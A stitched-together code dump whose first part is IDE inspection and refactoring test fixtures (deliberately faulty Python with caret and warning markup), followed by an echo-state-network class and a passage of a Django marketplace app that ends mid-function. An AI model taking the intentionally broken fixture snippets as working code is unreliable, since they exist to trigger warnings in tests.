def f(x1: Optional[T], x2: Union[T, Tuple[Any, Any]]):
print(x1, x2)
<the_ref>f
```
#### File: testData/quickdoc/ParamDescriptionInheritedMismatched.py
```python
class Base:
def method(self, foo, bar):
"""
:param foo: description
:param bar: description
"""
pass
class Sub(Base):
def met<the_ref>hod(self, param1, param2):
pass
```
#### File: testData/quickdoc/PropOldUndefinedSetter.py
```python
class C(object):
def _get(self):
"""Docstring."""
return 42
attr = property(fget=_get)
C().at<the_ref>tr = 42
```
#### File: testData/quickdoc/TypeVars.py
```python
from typing import TypeVar, List
T1 = TypeVar('T1', int)
T2 = TypeVar('T2', int, str)
T3 = TypeVar('T3', List[bool])
def f(p1: T1, p2: T2, p3: T3):
pass
<the_ref>f()
```
#### File: quickFixes/PyAddExceptionSuperClassQuickFixTest/emptySuperList.py
```python
class MyException:
def __new__(cls, x):
pass
def foo():
raise <warning descr="Exception doesn't inherit from base 'Exception' class">My<caret>Exception()</warning>
```
#### File: quickFixes/PyAddFieldQuickFixTest/addFieldAddConstructor_after.py
```python
class A:
def __init__(self, a, b):
self.a = a
self.b = b
class B(A):
def __init__(self, a, b):
A.__init__(self, a, b)
self.x = None
def foo(self):
return self.x
```
#### File: quickFixes/PyAddFieldQuickFixTest/addFieldFromInstance_after.py
```python
class A:
def __init__(self):
self.y = None
self.x = 1
a = A()
a.y+1
```
#### File: quickFixes/PyAddFieldQuickFixTest/addFieldFromMethod.py
```python
class A:
def __init__(self):
self.x = 1
def foo(self):
a = self.<caret><warning descr="Unresolved attribute reference 'y' for class 'A'">y</warning>
```
#### File: quickFixes/PyAsyncCallQuickFixTest/addAwaitBeforeCall_after.py
```python
async def bar():
return "hey"
async def foo():
await bar()
return True
```
#### File: quickFixes/PyConvertToNewStyleQuickFixTest/slots.py
```python
class B: pass
class A(B):
<warning descr="Old-style class contains __slots__ definition">__<caret>slots__</warning> = ""
def <warning descr="Old-style class contains __getattribute__ definition">__getattribute__</warning>(self, item):
pass
```
#### File: quickFixes/PyCreatePropertyQuickFixTest/getter.py
```python
class C(object):
def __init__(self):
self._x = None
@x.setter
def x(self, value):
self._x = value
c = C()
print(<warning descr="Property 'x' cannot be read">c.<caret>x</warning>)
del <warning descr="Property 'x' cannot be deleted">c.x</warning>
c.x = 1
```
#### File: quickFixes/PyMakeFunctionFromMethodQuickFixTest/usageClassCallArgument_after.py
```python
def m(x):
print 1
class A:
pass
m(1)
```
#### File: quickFixes/PyMakePublicQuickFixTest/positive_after.py
```python
class A:
def __init__(self):
self.x = 1
def _foo(self):
print(self.x)
a = A()
a._foo()
print(a.x)
```
#### File: quickFixes/PyMoveExceptQuickFixTest/exceptChain.py
```python
def foo():
pass
try:
foo()
except NameError:
pass
except Exception:
pass
except <warning descr="'NameError', superclass of exception class 'UnboundLocalError', has already been caught">UnboundLocalE<caret>rror</warning>:
pass
```
#### File: quickFixes/PyRemoveArgumentQuickFixTest/duplicateArg_after.py
```python
def foo(*args):
pass
a = ()
b = ()
foo(*a)
```
#### File: quickFixes/PyRemoveArgumentQuickFixTest/duplicate.py
```python
def foo(a, p):
pass
foo(1, p=2, <error descr="Keyword argument repeated">p=3<caret>3</error>)
```
#### File: quickFixes/PyRemoveStatementQuickFixTest/function_after.py
```python
def foo(r):
"""
:param r:
:return:
"""
x = 1
x = 2
```
#### File: quickFixes/PyTypeHintsQuickFixTest/functionAnnotationAndTypeComment_after.py
```python
def bar(a):
# type: (int) -> int
pass
```
#### File: quickFixes/PyTypeHintsQuickFixTest/functionAnnotationAndTypeComment.py
```python
def <warning descr="Type(s) specified both in type comment and annotation">b<caret>ar</warning>(a: int) -> int:
<warning descr="Type(s) specified both in type comment and annotation"># type: (int) -> int</warning>
pass
```
#### File: quickFixes/PyUpdatePropertySignatureQuickFixTest/getterNoPararm.py
```python
class A(Aa):
@property
def <warning descr="Getter signature should be (self)">x<caret></warning>():
return ""
@x.setter
def <warning descr="Setter should not return a value">x</warning>(self, r):
return r
```
#### File: argumentList/addParam/stub.py
```python
class object: pass
class datetime: pass
class ABCMeta: pass
class SuperClass: pass
def my_function(new_param,some_param="spam"): pass
def my_function_2(new_param,some_param): pass
def my_function_3(new_param,some_param="spam",some_another_param="eggs"): pass
```
#### File: refactoring/changeSignature/fixDocstringRemove.before.py
```python
def foo(a, d):
"""
:param a:
:param d:
"""
pass
foo("a", "b")
```
#### File: refactoring/changeSignature/keepKeywordOfArgumentBeforeEmptyVararg.before.py
```python
def f(y, *args, x):
pass
f(1, x=42)
```
#### File: refactoring/changeSignature/removeKeywordFromArgumentBeforeVararg.before.py
```python
def f(y, *args, x):
pass
f(1, 2, 3, x=42)
```
#### File: refactoring/changeSignature/updateDocstring.after.py
```python
def foo(a, d1=1):
"""
:param a:
:param d1:
"""
pass
foo("a", d1="b")
```
#### File: refactoring/extractmethod/BreakAst.after.py
```python
def cylinder_volume(r, h):
h * bar(r)
def bar(r_new):
return PI * r_new ** 2
```
#### File: refactoring/extractmethod/ClassMethod.before.py
```python
class C:
@classmethod
def foo(cls):
<selection>print('foo', cls)</selection>
```
#### File: refactoring/extractmethod/CommentIncluded.after.py
```python
def baz():
tmp = "!" # try to extract this assignment, either with or without this comment
baz()
def bar(self):
pass
```
#### File: refactoring/extractmethod/DuplicateInClass.before.py
```python
class A:
def baz(self):
print<caret> 1
print 1
def bar(self):
print 1
```
#### File: refactoring/extractmethod/GlobalVarAssignment.after.py
```python
x = 0
def foo():
global x
bar()
def bar():
global x
x = 1
```
#### File: refactoring/extractmethod/MethodContext.before.py
```python
class C:
def foo(self):
<selection>for x in [1, 2]:
print x</selection>
```
#### File: refactoring/extractmethod/MethodIndent.before.py
```python
class Foo(X, Y, Z):
def __init__(self):
for base in self__class__.__bases__:
<selection>try: base.__init__(self)
except AttributeError: pass</selection>
```
#### File: refactoring/extractmethod/Nonlocal.after.py
```python
def foo():
x = 1
def bar():
nonlocal x
baz()
print(x)
def baz():
nonlocal x
x = 2
bar()
foo()
```
#### File: refactoring/extractmethod/Statement.before.py
```python
def f():
a = 1
b = 1
<selection>print(a + b * 123)</selection>
```
#### File: extractsuperclass/moveAndMakeAbstractImportExistsPy3/source_module.py
```python
class MyClass():
@classmethod
def foo_method(cls):
spam = "eggs"
```
#### File: refactoring/extractsuperclass/withImport.before.py
```python
import os
class A(object):
def foo(self):
os.stat_result.n_fields()
```
#### File: refactoring/inlinelocal/py994.after.py
```python
class C:
def foo(self):
return Conference()
```
#### File: refactoring/introduceConstant/insertAfterImport.py
```python
import urllib
import urllib2
def foo():
return <caret>42
```
#### File: refactoring/introduceField/py4437.py
```python
class SomeClass():
def __init__(self):
self.x = 1
def foo(self):
<selection>''</selection>
```
#### File: refactoring/introduceParameter/localVariable1.py
```python
def f():
a = 1
print <caret>a + 3
```
#### File: refactoring/introduceParameter/localVariableParam.py
```python
def f(b=1):
return <caret>b + 1
```
#### File: refactoring/introduceVariable/backslash.after.py
```python
def f(x):
a = x.foo.bar
return a.baz()
```
#### File: refactoring/introduceVariable/callExpressionQualifier.after.py
```python
class MyClass:
def method(self):
return 42
a = MyClass()
x = a.method()
```
#### File: refactoring/introduceVariable/selectionBreaksBinaryOperator.after.py
```python
def foo():
a = 2 + 3
print 1 + a
```
#### File: refactoring/introduceVariable/suggestKeywordArgumentName.py
```python
def foo(**kwargs):
pass
foo(extra_context=<caret>{'a': 1})
```
#### File: refactoring/invertBoolean/parameter.before.py
```python
def foo(v<caret>ar=True):
var1 = True
return var
```
#### File: refactoring/makeFunctionTopLevel/localFunctionSimple.py
```python
global_var = 'spam'
def enclosing(p1, p2):
x = 42
def lo<caret>cal(p):
def nested():
print(p, x)
print(p1, p)
local('foo')
```
#### File: methodInsertionPositionUsageInAnotherFile/before/other.py
```python
def already_existing1():
pass
def already_existing2():
pass
from main import C
C().method()
def already_existing3():
pass
```
#### File: refactoring/makeFunctionTopLevel/methodNonlocalReferenceToOuterScope.py
```python
def func():
x = True
class C:
def me<caret>thod(self):
nonlocal x
x = False
```
#### File: refactoring/makeFunctionTopLevel/methodOtherMethodCalls.py
```python
class C:
def me<caret>thod(self):
self.another()
def another(self):
pass
```
#### File: refactoring/makeFunctionTopLevel/methodOverriddenSelf.py
```python
class C:
def me<caret>thod(self):
self = object()
```
#### File: refactoring/makeFunctionTopLevel/methodSelfUsedAsOperand.py
```python
class C(int):
def me<caret>thod(self):
print(self + 42)
```
#### File: refactoring/makeFunctionTopLevel/methodUniqueNameOfExtractedQualifier.after.py
```python
class AbstractBaseResponseHandler:
pass
def method(response, code):
if response:
return code
def func(abstract_base_response_handler, a):
a1 = AbstractBaseResponseHandler()
method(a1.response, a1.code)
```
#### File: refactoring/makeFunctionTopLevel/methodUniqueParamNames.after.py
```python
class C:
pass
def method(foo2, bar1, foo, foo1, bar):
print(foo2, bar1)
c = C()
method(c.foo, c.bar, 1, 2, bar=3)
```
#### File: refactoring/makeFunctionTopLevel/recursiveMethod.py
```python
class C:
def __init__(self, foo):
self.foo = foo
def me<caret>thod(self, foo):
self.method(self.foo)
C(1).method(2)
```
#### File: after/src/a.py
```python
from b import C
def main():
c = C()
print c
```
#### File: after/src/a.py
```python
import b
FOO = 'spam'
def func():
global FOO
b.VAR += 1
```
#### File: after/src/dst.py
```python
from lib import bar
from lib import baz, quux
from lib import foo
print(baz, quux)
def func():
print(foo, bar)
```
#### File: after/src/a.py
```python
from b import f
def f_usage():
return f(14)
class C(object):
def g(self, x):
return x
class D(C):
def g(self, x, y):
return super(D, self).f(x) + y
class E(object):
def g(self):
return -1
```
#### File: after/src/b.py
```python
import lib1.mod1
def f(x):
return lib1.mod1.k(x)(42)
```
#### File: before/src/a.py
```python
import lib1.mod1
def f(x):
return lib1.mod1.k(x)(42)
```
#### File: before/src/c.py
```python
import a
def main():
print(a.f(42))
```
#### File: before/src/classFile.py
```python
from collections import namedtuple
class Pipeline(namedtuple('_Pipeline', 'name')):
def __new__(cls, name):
return super(Pipeline, cls).__new__(cls, name)
def __init__(self, name):
pass
```
#### File: refactoring/pullup/dependenciesOrder.py
```python
class DataHolder:
VAR = 1
class Parent:
BOO = 12
def __init__(self):
self.c = 1
class Child(Parent): # Try to pull members up
CLASS_FIELD = 42
ANOTHER_CLASS_FIELD = CLASS_FIELD
FIELD = Parent.BOO
A_FIELD = DataHolder.VAR
@staticmethod
def foo():
return "A"
SOME_VAR = foo()
def __init__(self):
super(Child, self).__init__()
self.a = 12
self.b = self.c
self.d = Parent.BOO
i = 1
```
#### File: pullup/fieldMove/Class.after.py
```python
from SuperClass import SuperClass
class AnyClass(SuperClass):
def __init__(self):
super().__init__()
```
#### File: refactoring/pullup/instanceNotDeclaredInInit.py
```python
class Parent(object):
pass
class Child(Parent):
def foo(self):
self.foo = 12
```
#### File: refactoring/pullup/pyPullUpInfoModel.py
```python
class EmptyParent:pass
class SomeParent:
PARENT_CLASS_FIELD = 42
def __init__(self):
self.parent_instance_field = "egg"
def parent_func(self):
pass
class ChildWithDependencies(SomeParent, EmptyParent):
CLASS_FIELD_FOO = 42
CLASS_FIELD_DEPENDS_ON_CLASS_FIELD_FOO = CLASS_FIELD_FOO
CLASS_FIELD_DEPENDS_ON_PARENT_FIELD = SomeParent.PARENT_CLASS_FIELD
def __init__(self):
SomeParent.__init__(self)
self.instance_field_bar = 42
self.depends_on_instance_field_bar = self.instance_field_bar
self.depends_on_class_field_foo = ChildWithDependencies.CLASS_FIELD_FOO
@property
def new_property(self):
return 1
def _set_prop(self, val):
pass
def _get_prop(self):
return 1
def _del_prop(self):
pass
old_property = property(fset=_set_prop)
old_property_2 = property(fget=_get_prop)
old_property_3 = property(fdel=_del_prop)
@property
def new_property(self):
return 1
@new_property.setter
def new_property(self, val):
pass
@property
def new_property_2(self):
return 1
def normal_method(self):
pass
def method_depends_on_parent_method(self):
self.parent_func()
pass
def method_depends_on_parent_field(self):
i = self.parent_instance_field
pass
def method_depends_on_normal_method(self):
self.normal_method()
def method_depends_on_instance_field_bar(self):
eggs = self.instance_field_bar
def method_depends_on_old_property(self):
i = 12
self.old_property = i
q = self.old_property_2
del self.old_property_3
def method_depends_on_new_property(self):
self.new_property = 12
print(self.new_property_2)
```
#### File: pushdown/multiFileImports/parent_module.py
```python
from shared_module import module_function
class Parent(object):
def should_be_pushed(self):
module_function()
```
#### File: refactoring/rename/googleDocStringReturnType.py
```python
class F<caret>oo: pass
def func(foo):
"""
Returns:
Foo: ignored
"""
pass
```
#### File: refactoring/rename/renameField_after.py
```python
class Foo:
def __init__(self, id_value):
self.qu = id_value
f = Foo(3)
f.q<caret>u
```
#### File: refactoring/rename/renameInheritors_after.py
```python
class A:
def qu(self): pass
class B(A):
def qu(self): pass
```
#### File: refactoring/rename/renameLocalWithGenerator.py
```python
def function():
foo = 1
gen_expr = (f<caret>oo for foo in xrange(10))
print foo
```
#### File: refactoring/rename/renameLocalWithNestedGenerators.py
```python
def somefunc():
xx, yy = 1, 1
gen_object = (xx for y<caret>y in lst1 for xx in yy)
print(xx, yy)
```
#### File: refactoring/rename/renameSelfAndParameterAttribute.py
```python
class С:
def __init__(self, x=None):
if x is None:
self.foo = {
'A': {
'x': 0,
'y': 0,
},
}
else: # init was given the previous state
assert isinstance(x, С)
self.foo = {
'A': {
'x': x.f<caret>oo['A']['x'],
'y': x.foo['A']['y'],
},
}
```
#### File: resolve/callee/DecoParamCall.py
```python
def deco(prefix):
def fun(f):
print f
def dfun():
return [prefix, f()]
return dfun
return fun
@<caret>deco(1)
def foo():
pass
```
#### File: testData/resolve/ClassPrivateInherited.py
```python
class A(object):
__A = 1
class B(A):
def f(self):
self._<ref>_A # must fail
```
#### File: testData/resolve/DefaultInClass.py
```python
class A:
FOO = 1
def foo(self, param=F<ref>OO):
pass
```
#### File: testData/resolve/DunderClassInDeclarationInsideFunction.py
```python
def foo():
class A:
print(__class__)
# <ref>
return A()
```
#### File: testData/resolve/FieldInCondition.py
```python
class A:
def __init__(self):
if True:
self.qq = 1
def test(self):
print self.q<ref>q
```
#### File: testData/resolve/FStringNestedScopes.py
```python
def f(foo):
def g():
foo = 42
print(f'{foo}')
<ref>
```
#### File: testData/resolve/GlobalInNestedFunction.py
```python
foo = 0
def outer():
def inner():
global fo<ref>o
print(foo)
inner()
outer()
```
#### File: testData/resolve/GoogleDocstringParamType.py
```python
from datetime import datetime
def f(param):
"""
Parameters:
param (datetime) : timestamp
<ref>
"""
```
#### File: testData/resolve/InitOrNewReturnsInitWhenNewIsFirst.py
```python
class MyClass(object):
def __new__(cls):
return object.__new__(cls)
def __init__(self):
self.x = 42
```
#### File: testData/resolve/LookAhead.py
```python
def f():
return f<ref>oo
foo = 1
```
#### File: customMemberTargetClass/pkg/mod1.py
```python
class Clazz(object):
def member_fun(self):
return True
```
#### File: resolve/pyToJava/SuperMethod.py
```python
from java import util
class MyList(util.ArrayList):
def calc_size(self):
return self.si<ref>ze()
```
#### File: testData/resolve/UnboundVariableOnClassLevelDeclaredBelowAsTarget.py
```python
foo = 'global'
def method(foo):
class A:
print(foo)
# <ref>
foo = 'local'
print(foo)
```
#### File: testData/resolve/UnboundVariableOnClassLevelNotDeclaredBelow.py
```python
def method(foo):
class A:
print(foo)
# <ref>
```
#### File: testData/structureView/baseClassNames.py
```python
import lib1
class B1:
def f(self, x):
return x
class B2(object):
@staticmethod
def g(x):
return x
class C(B1, B2):
pass
class D1(C):
pass
class D2(C):
pass
# PY-3714
class D3(lib1.C):
pass
# PY-3731
class D4(foo.bar.C):
pass
```
#### File: testData/stubs/AttributeTypeDeclaration.py
```python
class MyClass:
foo: str
def __init__(self):
self.bar: int
```
#### File: stubs/complexGenericType/mod.py
```python
from typing import TypeVar, Generic, Tuple
T1 = TypeVar('T1')
T2 = TypeVar('T2')
T3 = TypeVar('T3')
class Base(Generic[T1, T2, T3]):
def __init__(self, x: T1):
pass
def m(self, x: T3) -> Tuple[T1, T2, T3]:
pass
```
#### File: stubs/dataclassField/dataclasses.py
```python
def dataclass(_cls=None, *, init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=False):
pass
def field(*, default=MISSING, default_factory=MISSING, init=True, repr=True,
hash=None, compare=True, metadata=None):
pass
```
#### File: testData/stubs/StubStructure.py
```python
def deco(fun):
return fun # valid
class FooClass:
staticField = deco
globs = globals()
def __init__(self):
self.instanceField = 2
@deco
def fooFunction(fooParam1, fooParam2=0) :
notAField = 3
pass
def topLevelFunction(tlfp1, tlfp2) :
pass
top1 = 1
if True:
top2 = 2
class BarClass(object):
__value = 0
def __get(self):
return self.__value
def __set(self, val):
self.__value = val
value = property(__get)
setvalue = property(fset=__set)
class BazClass(object):
__x = 1
@property
def x(self):
return self.__x
@x.setter
def x(self, v):
self.__x = v
```
#### File: testData/stubs/TypeAliasInParameterAnnotation.py
```python
from typing import Dict, Any
JsonObject = Dict[str, Any]
def func(x: JsonObject):
pass
```
#### File: createConfigurationTest/tests_folder/test_lonely.py
```python
from unittest import TestCase
from logic import smart_func
from tests_package.test_tools import ANSWER
class TestLonely(TestCase):
def test_test(self):
self.assertEqual(ANSWER, smart_func())
```
#### File: unit/subtestDots/test_test.py
```python
import unittest
class SampleTest(unittest.TestCase):
def test_sample(self):
for i in range(10):
with self.subTest(i=str(i)+'.'+str(i)):
self.assertTrue(i > 1)
```
#### File: unit/testDiff/test_test.py
```python
import unittest
class MyTestCase(unittest.TestCase):
def test_case(self):
self.assertEqual(1, 2, ('a', 'tuple'))
```
#### File: stdlib/3/builtins_test.py
```python
def test_zip():
assert(list(zip([1])) == [(1,)])
assert(list(zip([1], [2])) == [(1, 2,)])
assert(list(zip([1], [2], [3])) == [(1, 2, 3)])
assert(list(zip([1], [2], [3], [4])) == [(1, 2, 3, 4)])
assert(list(zip([1], [2], [3], [4], [5])) == [(1, 2, 3, 4, 5)])
assert(list(zip([1], [2], [3], [4], [5], [6])) == [(1, 2, 3, 4, 5, 6)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7])) == [(1, 2, 3, 4, 5, 6, 7)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7], [8])) == [(1, 2, 3, 4, 5, 6, 7, 8)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7], [8], [9])) == [(1, 2, 3, 4, 5, 6, 7, 8, 9)])
assert(list(zip([1], [2], [3], [4], [5], [6], [7], [8], [10])) == [(1, 2, 3, 4, 5, 6, 7, 8, 10)])
def test_open_path_like():
import sys
if sys.version_info >= (3, 6):
class A:
def __fspath__(self):
return sys.argv[0]
with open(A()) as f:
assert f.name == sys.argv[0]
def test_classmethod():
import abc
# test __init__
def a():
pass
assert isinstance(classmethod(a), classmethod)
# test __new__
def b():
pass
def c():
pass
def d():
pass
def e():
pass
assert isinstance(classmethod.__new__(classmethod, b, c, d=d, e=e), classmethod)
# test __func__
def f():
pass
assert classmethod(f).__func__ == f
# test __isabstractmethod__
@abc.abstractmethod
def g():
pass
def h():
pass
assert classmethod(g).__isabstractmethod__
assert not classmethod(h).__isabstractmethod__
# test __get__
class WrappedWithSM:
@classmethod
def foo(cls):
return 10
class ReassignedWithSM:
def foo(cls):
return 10
foo = classmethod(foo)
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM, type)).__name__ == "method"
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM)).__name__ == "method"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM, type)).__name__ == "method"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM)).__name__ == "method"
# test __dict__.keys()
assert set(classmethod.__dict__.keys()) == {'__init__', '__new__', '__func__', '__isabstractmethod__', '__get__',
'__dict__', '__doc__'}
def test_staticmethod():
import abc
# test __init__
def a():
pass
assert isinstance(staticmethod(a), staticmethod)
# test __new__
def b():
pass
def c():
pass
def d():
pass
def e():
pass
assert isinstance(staticmethod.__new__(staticmethod, b, c, d=d, e=e), staticmethod)
# test __func__
def f():
pass
assert staticmethod(f).__func__ == f
# test __isabstractmethod__
@abc.abstractmethod
def g():
pass
def h():
pass
assert staticmethod(g).__isabstractmethod__
assert not staticmethod(h).__isabstractmethod__
# test __get__
class WrappedWithSM:
@staticmethod
def foo():
return 10
class ReassignedWithSM:
def foo():
return 10
foo = staticmethod(foo)
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM, type)).__name__ == "function"
assert type(WrappedWithSM.__dict__["foo"].__get__(WrappedWithSM)).__name__ == "function"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM, type)).__name__ == "function"
assert type(ReassignedWithSM.__dict__["foo"].__get__(ReassignedWithSM)).__name__ == "function"
# test __dict__.keys()
assert set(staticmethod.__dict__.keys()) == {'__init__', '__new__', '__func__', '__isabstractmethod__', '__get__',
'__dict__', '__doc__'}
def test_str_init_new():
class A:
def __str__(self):
return "A"
assert str.__new__(str) is not None
assert str.__new__(str, A()) is not None
assert str.__new__(str, b"foo") is not None
assert str.__new__(str, b"foo", "utf-8") is not None
assert str.__new__(str, b"foo", "utf-8", "strict") is not None
assert str() is not None
assert str(A()) is not None
assert str(b"foo") is not None
assert str(b"foo", "utf-8") is not None
assert str(b"foo", "utf-8", "strict") is not None
def test_int_init_new():
class A:
def __int__(self):
return 5
assert int.__new__(int) is not None
assert int.__new__(int, A()) is not None
assert int.__new__(int, u"100") is not None
assert int.__new__(int, b"100") is not None
assert int.__new__(int, u"100", 2) is not None
assert int.__new__(int, b"100", 2) is not None
assert int() is not None
assert int(A()) is not None
assert int(u"100") is not None
assert int(b"100") is not None
assert int(u"100", 2) is not None
assert int(b"100", 2) is not None
def test_dict_update():
d = {}
d.update({"k1": 1, "v1": 1})
d.update([("k2", 2), ("v2", 2)])
d.update(k3=3, v3=3)
assert d == {"k1": 1, "v1": 1, "k2": 2, "v2": 2, "k3": 3, "v3": 3}
``` |
{
"source": "jnthnroy/Reservoir-Computing-framework-for-multivariate-time-series-classification",
"score": 3
} |
#### File: Reservoir-Computing-framework-for-multivariate-time-series-classification/code/reservoir.py
```python
import numpy as np
from scipy import sparse
class Reservoir(object):
"""
Build a reservoir and evaluate internal states
Parameters:
n_internal_units = processing units in the reservoir
spectral_radius = largest eigenvalue of the reservoir matrix of connection weights
leak = amount of leakage in the reservoir state update (optional)
connectivity = percentage of nonzero connection weights (unused in circle reservoir)
input_scaling = scaling of the input connection weights
noise_level = deviation of the Gaussian noise injected in the state update
circle = generate determinisitc reservoir with circle topology
"""
def __init__(self, n_internal_units=100, spectral_radius=0.99, leak=None,
connectivity=0.3, input_scaling=0.2, noise_level=0.01, circle=False):
# Initialize attributes
self._n_internal_units = n_internal_units
self._input_scaling = input_scaling
self._noise_level = noise_level
self._leak = leak
# Input weights depend on input size: they are set when data is provided
self._input_weights = None
# Generate internal weights
if circle:
self._internal_weights = self._initialize_internal_weights_Circ(
n_internal_units,
spectral_radius)
else:
self._internal_weights = self._initialize_internal_weights(
n_internal_units,
connectivity,
spectral_radius)
def _initialize_internal_weights_Circ(self, n_internal_units, spectral_radius):
# Construct reservoir with circular topology
internal_weights = np.zeros((n_internal_units, n_internal_units))
internal_weights[0,-1] = 1.0
for i in range(n_internal_units-1):
internal_weights[i+1,i] = 1.0
# Adjust the spectral radius.
E, _ = np.linalg.eig(internal_weights)
e_max = np.max(np.abs(E))
internal_weights /= np.abs(e_max)/spectral_radius
return internal_weights
def _initialize_internal_weights(self, n_internal_units,
connectivity, spectral_radius):
# Generate sparse, uniformly distributed weights.
internal_weights = sparse.rand(n_internal_units,
n_internal_units,
density=connectivity).todense()
# Ensure that the nonzero values are uniformly distributed in [-0.5, 0.5]
internal_weights[np.where(internal_weights > 0)] -= 0.5
# Adjust the spectral radius.
E, _ = np.linalg.eig(internal_weights)
e_max = np.max(np.abs(E))
internal_weights /= np.abs(e_max)/spectral_radius
return internal_weights
def _compute_state_matrix(self, X, n_drop=0):
N, T, _ = X.shape
previous_state = np.zeros((N, self._n_internal_units), dtype=float)
# Storage
state_matrix = np.empty((N, T - n_drop, self._n_internal_units), dtype=float)
for t in range(T):
current_input = X[:, t, :]
# Calculate state
state_before_tanh = self._internal_weights.dot(previous_state.T) + self._input_weights.dot(current_input.T)
# Add noise
state_before_tanh += np.random.rand(self._n_internal_units, N)*self._noise_level
# Apply nonlinearity and leakage (optional)
if self._leak is None:
previous_state = np.tanh(state_before_tanh).T
else:
previous_state = (1.0 - self._leak)*previous_state + np.tanh(state_before_tanh).T
# Store everything after the dropout period
if (t > n_drop - 1):
state_matrix[:, t - n_drop, :] = previous_state
return state_matrix
def get_states(self, X, n_drop=0, bidir=True):
N, T, V = X.shape
if self._input_weights is None:
self._input_weights = (2.0*np.random.binomial(1, 0.5 , [self._n_internal_units, V]) - 1.0)*self._input_scaling
# compute sequence of reservoir states
states = self._compute_state_matrix(X, n_drop)
# reservoir states on time reversed input
if bidir is True:
X_r = X[:, ::-1, :]
states_r = self._compute_state_matrix(X_r, n_drop)
states = np.concatenate((states, states_r), axis=2)
return states
``` |
{
"source": "jnthnrzr/food-craving-survey",
"score": 3
} |
#### File: backend/tests/test_models.py
```python
import unittest
from datetime import datetime
from unittest.mock import MagicMock
from app.models import Trial
class TestMockTrialModel(unittest.TestCase):
@classmethod
def setUpClass(cls):
mock_trial = MagicMock(spec=Trial)
mock_trial.participant = 99
mock_trial.session = 99
mock_trial.date = datetime.today()
cls.trial = mock_trial
def test_trial_instance(self):
trial = self.trial
self.assertIsInstance(trial, Trial)
def test_participant_label(self):
label = 'participant'
attributes = dir(self.trial)
self.assertIn(label, attributes)
def test_participant_data_type(self):
data_type = type(self.trial.participant)
self.assertIs(data_type, int)
def test_session_data_type(self):
data_type = type(self.trial.session)
self.assertIs(data_type, int)
def test_session_label(self):
label = 'session'
attributes = dir(self.trial)
self.assertIn(label, attributes)
def test_date_label(self):
label = 'date'
attributes = dir(self.trial)
self.assertIn(label, attributes)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jnthnrzr/git-hooks",
"score": 3
} |
#### File: jnthnrzr/git-hooks/test_my_math.py
```python
import my_math
import unittest
class TestAdd(unittest.TestCase):
def test_add_integers(self):
result = my_math.add(1, 2)
self.assertEqual(result, 3)
def test_add_floats(self):
result = my_math.add(10.5, 2)
self.assertEqual(result, 12.5)
class TestMultiply(unittest.TestCase):
def test_multiply_integers(self):
result = my_math.multiply(1, 2)
self.assertEqual(result, 2)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jnthnrzr/rent-buy-sell",
"score": 2
} |
#### File: marketplace/views/buy_item_details_user.py
```python
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from ..models import UserProfile, Product
from ..date_checker import update_all
@login_required
def buy_item_details_users(request):
update_all()
profile = UserProfile.objects.get(user=request.user)
context_dict = {
'user': request.user.username,
'money': profile.balance,
'user.is_authenticated': True,
}
if request.method == "POST":
product_pk = request.POST.get('pk','')
product = Product.objects.get(pk = product_pk) # access the product, do what you will with it
# TODO Add to shopping cart logic
return render(request, 'item-details.html', context_dict)
```
#### File: marketplace/views/orders.py
```python
from django.contrib.auth.decorators import login_required
from django.db.models import Sum
from django.contrib.auth.models import User
from django.shortcuts import render
from ..models import Order, ShoppingCart, UserProfile, Rating, Complaint, Product
from ..update_rating import update_rating
from ..date_checker import update_all
@login_required
def orders(request):
# Render the page for previous orders
profile = UserProfile.objects.get(user=request.user)
context_dict = dict()
update_all()
if "confirm_checkout" in request.POST:
cart = ShoppingCart.objects.get(user=profile)
#print("\n\n",cart.products.all,"\n\n")
#totalPrice=0
#for i in cart:
# totalPrice+=double(i.price)
print("\n\n", float(cart.products.all().aggregate(Sum('price'))['price__sum']), profile.balance, "\n\n")
if float(cart.products.all().aggregate(Sum('price'))['price__sum']) > profile.balance:
context_dict['username'] = request.user.username
context_dict['money'] = profile.balance
context_dict['messages']="You do not have enough money on your account for these purchases."
return render(request, 'badAction.html', context_dict)
new_order = Order(user=profile)
new_order.save()
new_order.products.add(*cart.products.all())
for product in cart.products.all():
seller = product.seller
seller.balance += product.price
seller.save()
profile.balance -= product.price
profile.save()
product.quantity -= 1
if product.quantity == 0:
product.is_active = False
product.save()
profile.transactions += len(cart.products.all())
profile.save()
# cart_total = cart.products.all().aggregate(Sum('price'))
# print("++++++++++++++++++ CART TOTAL IS:", cart_total)
# amount = cart_total['price__sum']
new_order.totalPrice = cart.totalPrice
print("++++++++ NEW ORDER TOTALING:", new_order.totalPrice)
# print("CART TOTAL was: $", amount)
#context_dict['totalPrice'] = new_order.totalPrice
new_order.save()
cart.delete()
all_orders = Order.objects.filter(user=profile)
#print(all_orders[0].totalPrice)
# Check if previous orders exist
if all_orders.count():
orders_list = list(all_orders.all())
order_dic = dict()
for order in orders_list:
product_dic = dict()
# print("*************", order.totalPrice)
product_dic['total'] = float(order.totalPrice)
product_list = list(order.products.all())
product_dic['products'] = product_list
# print("%%%%%%%%%% product_dic: ", product_dic)
order_dic[str(order.pk)] = product_dic
# order_dic[str(order.pk)] = product_list
context_dict['allorders'] = order_dic
print("######### allorders::", order_dic)
# orderlist=list(all_orders.all())
# price_dic={}
# for i in orderlist:
# price_dic[str(i.pk)] = i.totalPrice
# context_dict['totalPrice'] = price_dic
# print("\n\nTotal price dict\n",context_dict['totalPrice'],"\n\n")
# print("\n\nFull dictionary:\n",context_dict,"\n\n")
context_dict['username'] = request.user.username
context_dict['money'] = profile.balance
#context_dict['all_orders'] = all_orders
#print("\n\n",all_orders,"\n\n")
#context_dict['totalPrice'] = all_orders.totalPrice
check_vip(profile)
if "rating" in request.POST:
rating_input = request.POST['rating']
listed_product_pk = request.POST['product_pk']
prod = Product.objects.get(pk= listed_product_pk)
listed_seller = prod.seller
user_seller = User.objects.get(username = listed_seller)
seller_profile = UserProfile.objects.get(user = user_seller)
